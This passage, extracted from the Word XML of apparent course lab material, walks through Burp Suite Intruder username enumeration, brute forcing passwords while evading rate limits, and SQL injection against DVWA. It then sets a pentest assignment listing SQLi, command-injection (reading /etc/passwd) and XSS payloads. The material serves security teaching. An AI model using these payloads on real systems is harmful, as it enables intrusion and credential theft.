    <w:p w14:paraId="772A177B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Highlight username field: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>§admin§</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3B68E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Ensure only username is marked as payload position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F3C9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Create Payload List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893CF30" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Go to Payloads tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29801A9D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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 "Payload options", select "Simple list"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289B906" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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"Load" and load common usernames:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BF9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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5CA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administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6544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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF59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user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004083A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test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4607AA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guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F318F50" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Or paste in Payload list field directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53C17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Configure Response Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730A333" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Options tab → Grep-Match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1E09A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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"New" and add search strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D423E34" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"User exists" (positive response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11590498" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Invalid credentials" (negative response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11FB6F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Account locked" (another positive indicator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE79E5B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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These help identify which usernames exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2B20B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Execute Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965378C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Start attack"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10D0BE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Monitor results in attack results table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2515E3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Identify usernames with unique response patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC591E2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Column "Username exists" marks confirmed usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A84F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Save Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AAC00" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Right-click results table → Export → HTML report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B55A69" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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which usernames were identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A42E4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Filter results where response indicates user exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4E90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5B: Password Brute Force with Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2BFD2B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Setup Password Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C35BC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Capture successful login request in Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C64257" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Send to Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBE3AA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Mark password field: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>§password123§</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3389C55A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Leave username as known value (e.g., admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4764EA4E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Create Password Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D9FA9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Go to Payloads tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F62CA65" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Select payload type: "Simple list" or "Brute forcer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB60C7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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For brute forcer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC9534" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Character set: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB49660" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Min length: 4, Max length: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9BA56" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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generates all combinations (very slow, for education only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E70CC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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For wordlist attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA301B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Load common passwords file: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D444829" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Subset first 100-1000 passwords for lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F912A4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Configure Success Indication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0EE5E3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Options tab → Grep-Match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996336B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Login successful" or redirect to dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F76C0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Also add "Failed" or "Invalid" as negative indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB665D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Step 4: Optimize Attack Timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52C39E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Resource pool → Threads: Set to 5 (Avoid overloading target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11276954" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Request engine → Delay: Add 100ms between requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300088B1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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prevents rate limiting and DOS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F88CB97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Execute Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF718CD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Start attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F4C1C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Monitor progress in results table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97ADA2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Look for response showing successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EECE337" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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successful password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D573C6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6: Demonstrate Rate Limiting Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C72EA7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 response codes changing (429, 503)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F556739" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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indicates rate limiting activated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65FC82" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Slow down attack further or stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594B204" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Wait several minutes before resuming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DEC1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5C: SQL Injection Detection with Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD60CE2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Identify SQLi Injection Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B92997" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Capture DVWA SQL injection request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D90DA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send to Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AAC94" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Mark ID parameter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>§1§</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B51C7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Create SQLi Payload List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED18FB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Payloads tab → Simple list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE43F49" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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SQL injection test strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C8E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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDEA8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1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C00D2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1" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0AB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1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE69C4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1' UNION SELECT NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560561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1' AND SLEEP(5) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277477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admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E31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' OR 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D872DC5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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These test for various SQLi techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3B8A1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3: Response Analysis Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FEDF12" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Options → Grep-Extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C05C34" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Define extraction pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;font color="blue"&gt;&lt;em&gt;(.*?)&lt;/em&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E063E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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extracts user information from vulnerable response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706250B6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Also add Grep-Match for error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF4E4E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4: Execute SQLi Detection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742BC74C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Start attack with reasonable thread count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E899AF5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 different responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A75A9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Errors indicate possible injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5080E6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Changes in output indicate successful queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DF3B6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Timing delays indicate time-based blind SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B6636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5: Analyze Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFCD7F7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Filter results showing non-standard responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF62154" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Identify which payloads produced anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669846F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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response length changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A65E6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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SQLi vulnerability confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF3FEA5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1903F67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17CF4D4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6: Comprehensive Web Application Penetration Test Assignment (3%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C950A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Assignment Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327858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Conduct a complete penetration test of a vulnerable web application (DVWA or bWAPP) and document findings in professional report format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E39B59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Assignment Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F7B11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Objective:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify, exploit, and document 5-7 distinct vulnerabilities in the target application, demonstrating mastery of Week 9 concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751339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Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51351433" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Target: DVWA with Security Level "Low" or bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54DB64" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Timeframe: Complete within lab session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7176A0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Tools: Burp Suite, SQLMap, manual testing, custom scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0B629" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Documentation: Detailed technical report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B91B2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1: Reconnaissance and Planning (15%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53CCB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1.1 Application Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E038C8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Document all pages and functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF1704" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Identify all input fields (forms, parameters, cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052BD6E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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List client-side technologies (JavaScript, frameworks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A2204" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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server response headers and technology stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37D35D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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visual sitemap showing all endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB45D72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1.2 Threat Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38719CE8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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For each input field, determine potential attack vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799D367C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F403AD2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D42DB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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File upload abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439AD115" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553E07B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD79DF6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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threat matrix prioritizing high-risk areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3A09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Example Documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C479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PAGE: /DVWA/vulnerabilities/sqli/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447609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FUNCTIONALITY: User lookup by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C2F1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INPUTS: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8687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 GET parameter "id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF87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 GET parameter "Submit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02FC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THREAT VECTORS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8EA9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 SQL injection (HIGH RISK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9DF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 Blind SQLi possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F76D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- Time-based SQLi likely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2EB9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INITIAL ASSESSMENT: CRITICAL VULNERABILITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94420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2: Vulnerability Identification (20%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB71ADA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 Systematic Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E227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Test each input for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE1B0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Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEF065" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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SQL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>' OR '1'='1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UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, time-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389366C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>; whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>| cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F99E15" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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LDAP, XML injection variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032651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XSS Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D1EE9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Reflected: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777BEB8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Stored: Input XSS payload, refresh, check persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC45CE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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DOM: Check JavaScript handling of user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EA2B6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Authentication Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476506C5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C187B7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Weak password reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60802A48" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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JWT vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2EBD7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Session fixation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E6F39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File Upload Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DA890" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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executable files (.php, .jsp, .asp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB86166" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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MIME type bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D4BAA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Double extension attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC88C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Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A83A32" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Direct object reference (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD6C68" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Horizontal privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C475E6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Vertical privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBC12A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2.2 Documentation Template for Each Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E33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VULNERABILITY ID: V-001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBA4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TITLE: SQL Injection in User Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B472D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SEVERITY: CRITICAL (CVSS 9.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4659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LOCATION: /DVWA/vulnerabilities/sqli/?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DAF2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ATTACK VECTOR: GET parameter 'id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C86B3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551847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VULNERABILITY DESCRIPTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85C9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The application directly concatenates user input into SQL queries without </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8851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parameterization. An attacker can inject SQL commands to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A8E3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Extract database contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F48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Modify or delete data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA77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Bypass authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2E0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Execute administrative functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115CE43B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AC539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PROOF OF CONCEPT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750FD5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Input: 1' UNION SELECT user,password FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BA15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Output: [Lists all users and password hashes]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8CFAF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B04410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IMPACT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F2B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Confidentiality: HIGH (all data accessible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74502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Integrity: HIGH (data can be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58329C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Availability: HIGH (database can be dropped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6B274" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E8CC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REMEDIATION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1AC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Implement parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16688D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Use prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44075B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Apply input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F7E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Implement least privilege on DB accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F738D78" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F06F8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REFERENCES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982CF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OWASP Top 10 A05:2025 - Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A4A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CWE-89: Improper Neutralization of Special Elements used in SQL Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EDB12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3: Exploitation and Proof of Concept (30%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB29EAD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 Develop Working Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E4DC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For each vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307BB486" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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manual step-by-step exploitation guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9469C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Develop automated exploit script if applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A67E8E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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 tool usage (Burp Suite, SQLMap, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651C3AE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Generate evidence (screenshots/video)</w:t>
      </w:r>
    </w:p>
